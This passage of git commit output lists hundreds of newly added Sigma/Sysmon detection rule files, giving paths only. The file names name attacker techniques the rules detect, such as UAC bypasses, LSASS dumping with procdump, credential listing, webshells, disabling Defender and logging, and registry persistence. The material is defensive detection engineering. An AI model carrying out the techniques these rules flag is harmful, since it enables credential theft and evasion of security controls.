tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_use_of_te_bin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_userinit_child.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_susp_workfolders.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_procdump.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_sdelete.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_config_update.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_sysprep_appdata.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_systeminfo_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_takeown_recursive_own.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tapinstall_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tar_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tar_extraction.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_taskkill_sep.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tasklist_basic_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_taskmgr_localsystem.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_taskmgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tscon_localsystem.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tscon_rdp_redirect.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_tscon_rdp_session_hijacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_changepk_slui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_dismhost.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_fodhelper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_ieinstal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_trustedpath.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ultravnc.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vscode_tunnel_service_install.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_w32tm.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wab_unusual_parents.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wbadmin_delete_systemstatebackup.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webdav_lnk_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_chopper.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_hacking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_susp_process_spawned_from_webserver.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_webshell_tool_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_werfault_reflect_debugger_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wermgr_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wermgr_susp_exec_location.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wget_download_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_where_browser_data_recon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_all_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_groups_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_output.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_parent_anomaly.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_whoami_priv_discovery.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_windows_terminal_susp_children.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_add_custom_source.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_add_susp_custom_source.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winget_local_install_via_manifest.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrar_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_awl_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_remote_powershell_session_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winrm_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_winzip_password_compression.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_namespace_defender.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_process_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_computersystem.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_csproduct.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_group.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_hotfix.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_product.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_product_class.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_service_manipulation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_susp_execution_via_office_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_susp_process_creation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_terminate_application.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_uninstall_application.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_uninstall_security_products.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmic_xsl_script_processing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmiprvse_spawning_process.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wpbbin_potential_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wscript_cscript_script_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wsl_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wuauclt_dll_loading.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_creation/proc_creation_win_wusa_susp_parent_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/process_tampering/proc_tampering_susp_process_hollowing.yml create mode 100644 tools/sigmac/converted_rules/sysmon/raw_access_thread/raw_access_thread_susp_disk_access_using_uncommon_tools.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_malware_netwire.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_malware_ursnif.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_amsi_providers.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_com_key_linking.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_persistence_logon_scripts_userinitmprlogonscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_pua_sysinternals_renamed_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_add/registry_add_pua_sysinternals_susp_execution_via_eula.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_mstsc_history_cleared.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_add_local_hidden_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_leviathan.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_oceanlotus_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_oilrig_mar18.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_apt_pandemic.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_bypass_via_wsreset.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_cmstp_execution_by_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_hack_wce_reg.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_mal_azorult.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_mal_flowcloud.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_malware_qakbot_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_mimikatz_printernightmare.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_modify_screensaver_binary_path.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_narrator_feedback_persistance.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_net_ntlm_downgrade.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_office_test_regadd.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_office_trust_record_modification.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_persistence_recycle_bin.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_portproxy_registry_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_redmimicry_winnti_reg.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_runkey_winekey.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_runonce_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_shell_open_keys_manipulation.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_silentprocessexit_lsass.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_ssp_added_lsa_config.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_stickykey_like_backdoor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_atbroker_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_download_run_key.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_lsass_dll_load.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_event_susp_mic_cam_access.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_event/registry_set_enable_anonymous_connection.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_add_port_monitor.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_aedebug_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_amsi_com_hijack.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_classes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_office.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_winsock2.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_classes.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bginfo_custom_db.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bginfo_custom_vbscript.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_blackbyte_ransomware.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_rdp_port.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_security_zones.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_change_winevt_channelaccess.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_chrome_extension.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_clickonce_trust_prompt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_cobaltstrike_service_installs.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_comhijack_sdclt.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_crashdump_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_creation_service_susp_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_custom_file_open_handler_powershell_execution.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_defender_exclusions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_desktop_background_change.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_function_user.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_privacy_settings_experience.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_system_restore.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_windows_firewall.yml create mode 100644 tools/sigmac/converted_rules/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml create mode 100644 